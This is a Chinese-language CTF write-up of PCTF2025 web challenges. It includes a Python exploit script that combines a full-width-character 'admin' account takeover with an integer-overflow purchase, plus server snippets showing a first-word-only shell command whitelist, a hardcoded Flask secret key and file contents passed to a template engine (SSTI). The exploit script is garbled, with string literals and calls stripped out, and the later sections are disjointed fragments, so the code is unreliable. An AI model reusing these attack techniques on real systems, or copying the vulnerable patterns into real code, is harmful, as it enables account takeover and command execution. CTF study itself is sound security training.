PCTF2025 Web 赛题实战解析：从整数溢出到 SSTI | 极客日志

Python算法

PCTF2025 Web 赛题实战解析：从整数溢出到 SSTI

本次复盘 PCTF2025 Web 后半部分赛题，涵盖神秘商店、We_will_rockyou、Jwt_password_manager 等多个挑战。核心考点包括全角字符绕过、整数溢出、JWT 密钥泄露与伪造、命令执行白名单绕过、文件上传导致的 SSTI 以及 Flask Session 构造。通过源码审计发现逻辑缺陷，结合脚本自动化与手动测试完成解题。重点分析了后端验证机制的薄弱环节，如随机密钥生成后的硬编码风险、模板渲染时的未过滤输入处理等，为同类 Web 安全加固提供参考。

ByteFlow发布于 2026/3/270 浏览

PCTF2025 Web 赛题实战解析：从整数溢出到 SSTI

PCTF2025 Web 后半部分复盘

本次复盘涵盖了 PCTF2025 Web 方向的后半部分赛题，主要涉及 Python/Flask 框架下的多种常见漏洞。通过源码审计与逻辑分析，我们定位了全角字符绕过、整数溢出、JWT 伪造、命令执行及模板注入等关键点。

神秘商店

题目提供了一个登录框，目标是获取 Flag。核心思路在于利用全角字符绕过后端检测，并结合整数溢出修改余额。

全角字符绕过

后端代码对用户名进行了转换处理，但存在逻辑缺陷。使用全角字符 admiｎ（注意最后一个 n 是全角）注册时，后端可能将其识别为普通 ASCII 的 admin，从而覆盖原有账户或创建新账户。这导致我们可以控制 admin 的密码。

文章配图

注册成功后，即可登录并尝试操作。

整数溢出攻击

在 Rust 编写的后端中，余额计算可能存在整数溢出风险。通过将余额设置为接近最大值的数值（如 4294967246），使其在运算后回绕至较小值（如 50），从而以极低成本购买 Flag。

import requests

def exploit():
    url = "http://challenge2.pctf.top:32735"
    session = requests.Session()
    
    # 注册管理员账户，使用全角字符
    print("[+] 注册管理员账户...")
    users = {"username": "admi\uFF4E", "password": "123456"}
    response = session.post(f"{url}/register", data=users)
    print(f"[+] 注册响应：{response.status_code}")
    
    # 登录
    print("[+] 登录...")
    users = {"username": "admi\uFF4E", "password": "123456"}
    response = session.post(f"{url}/login", data=users)
    print(f"[+] 登录响应：{response.status_code}")
    
    # 查看用户信息
    response = session.get()
    ()
    
    
    ()
    amount = {: }
    response = session.post(, data=amount)
    ()
    
    
    ()
    product = {: }
    response = session.post(, json=product)
    ()

 __name__ == :
    exploit()

# 启动逻辑片段
admin_password = str(uuid.uuid4())
for path in ['/password', './password.txt']:
    try:
        if os.path.exists(path) and os.path.isfile(path):
            with open(path, 'rb') as f:
                raw = f.read()
                text = raw.decode('utf-8', errors='replace').strip()
                candidates = [line.strip() for line in text.splitlines() if line.strip()]
                if candidates:
                    import secrets
                    admin_password = secrets.choice(candidates)
                    break
    except: pass

SAFE_COMMANDS = ['ls', 'pwd', 'whoami', 'dir', 'more']
@app.route('/dashboard/run', methods=['POST'])
@login_required
def run_command(user_id, username):
    cmd = request.form.get('command', '').strip()
    # 风险点：只判断第一个单词
    if not cmd or cmd.split()[0] not in SAFE_COMMANDS:
        return render_template(..., error_msg="Error: Command not allowed...")
    try:
        result = subprocess.run(cmd, shell=True, capture_output=True, text=True, timeout=5)
        output = result.stdout + result.stderr
        return render_template(..., output=output, command=cmd)
    except Exception as e:
        return render_template(..., error_msg=f"Error: {str(e)}")

app.config['SECRET_KEY'] = '0f3cbb44-f199-4d34-ade9-1545c0972648'

# 模拟 CTF 环境
for path in ['/flag', './flag.txt']:
    try:
        if os.path.exists(path) and os.path.isfile(path):
            with open(path, 'rb') as f:
                raw = f.read()
                content = raw.decode('utf-8', errors='replace').strip()
                add_password_item('admin', website='seeded-flag', password=content)
                break
    except: pass

@app.route('/file')
def view_file():
    file_path = request.args.get('file', '')
    # ... 黑名单检查 ...
    try:
        with open(file_path, 'r', encoding='utf-8') as f:
            file_content = f.read()
        # 高危：直接将文件内容传入模板引擎
        return render_template_string(template, file_path=file_path, file_content=file_content)
    except Exception as e:
        # ... 错误处理 ...